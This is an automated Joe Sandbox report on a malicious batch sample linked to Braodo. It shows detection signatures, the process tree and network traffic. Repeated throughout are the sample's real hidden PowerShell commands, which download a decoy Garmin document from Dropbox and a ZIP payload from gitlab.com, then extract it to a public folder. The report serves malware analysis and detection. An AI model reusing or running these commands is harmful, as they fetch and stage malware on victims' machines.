Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hnskdfgjgar22.bat

Overview

General Information

Sample name:hnskdfgjgar22.bat
Analysis ID:1580250
MD5:ed0e925d4c24330ba19fadc0fa66c439
SHA1:cf2e90032cb7f47df5c7a2104260b167cb61288a
SHA256:d612e6d64d2b598b2c0db5434d946f0f02237eb0bf80eaa8801c59f2519769c8
Tags:batuser-RavenR00tkit
Infos:

Detection

Abobus Obfuscator, Braodo
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Abobus Obfuscator
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 7480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnskdfgjgar22.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chcp.com (PID: 7532 cmdline: chcp.com 437 MD5: 33395C4732A49065EA72590B14B64F32)
    • findstr.exe (PID: 7548 cmdline: findstr /L /I set "C:\Users\user\Desktop\hnskdfgjgar22.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 7564 cmdline: findstr /L /I goto "C:\Users\user\Desktop\hnskdfgjgar22.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 7580 cmdline: findstr /L /I echo "C:\Users\user\Desktop\hnskdfgjgar22.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • findstr.exe (PID: 7596 cmdline: findstr /L /I pause "C:\Users\user\Desktop\hnskdfgjgar22.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • find.exe (PID: 7612 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • find.exe (PID: 7644 cmdline: find MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • cmd.exe (PID: 7660 cmdline: C:\Windows\system32\cmd.exe /c type tmp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 7676 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 7844 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 7928 cmdline: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/awsr/ga/-/raw/main/FGA2112.zip', 'C:\Users\Public\Document.zip')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 7728 cmdline: powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
hnskdfgjgar22.batJoeSecurity_AbobusObfuscatorYara detected Abobus ObfuscatorJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 7676JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 7928JoeSecurity_Braodo_1Yara detected BraodoJoe Security
        Process Memory Space: powershell.exe PID: 7928JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          SourceRuleDescriptionAuthorStrings
          amsi64_7676.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi64_7928.amsi.csvJoeSecurity_Braodo_1Yara detected BraodoJoe Security
              amsi64_7928.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnskdfgjgar22.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", ProcessId: 7676, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnskdfgjgar22.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", ProcessId: 7676, ProcessName: powershell.exe
                Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7928, TargetFilename: C:\Users\Public\Document.zip
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7728, TargetFilename: C:\Users\Public\Document\Scripts\normalizer.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnskdfgjgar22.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", ProcessId: 7676, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnskdfgjgar22.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", ProcessId: 7676, ProcessName: powershell.exe
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnskdfgjgar22.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", ProcessId: 7676, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnskdfgjgar22.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7480, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V15.docx')", ProcessId: 7676, ProcessName: powershell.exe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
                Source: unknownHTTPS traffic detected: 162.125.65.18:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn_ source: powershell.exe, 0000000B.00000002.1744666842.000001C9653F1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Vinay\Projects\simple_launcher\dist\t64.pdb source: pip.exe.18.dr
                Source: Binary string: n.pdb source: powershell.exe, 0000000B.00000002.1745510882.000001C965543000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000B.00000002.1744666842.000001C965357000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1744666842.000001C9653CB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.pdb source: powershell.exe, 0000000B.00000002.1745510882.000001C965560000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.pdbw source: powershell.exe, 0000000B.00000002.1745510882.000001C965560000.00000004.00000020.00020000.00000000.sdmp
                Source: global trafficHTTP traffic detected: GET /scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /awsr/ga/-/raw/main/FGA2112.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 162.125.65.18 162.125.65.18
                Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /scl/fi/vhrhih3o3p0hmeliarlms/Garmin_Campaign_Information_for_Partners_V15.docx?rlkey=iaci7bnjojiy1pqkwsdtq4d9m&st=bgm6bs4o&dl=1 HTTP/1.1Host: www.dropbox.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /awsr/ga/-/raw/main/FGA2112.zip HTTP/1.1Host: gitlab.comConnection: Keep-Alive
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E95C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: img-src https://* data: blob: ; base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://*.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; media-src https://* blob: equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E93C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://*.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; media-src https://* blob: equals www.yahoo.com (Yahoo)
                Source: powershell.exe, 0000000B.00000002.1728314809.000001C94E960000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: img-src https://* data: blob: ; base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-ancestors 'self' https://*.dropbox.com ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; media-src https://* blob: equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                Source: global trafficDNS traffic detected: DNS query: uc2080206253754f3f57017a4a9f.dl.dropboxusercontent.com
                Source: global trafficDNS traffic detected: DNS query: gitlab.com
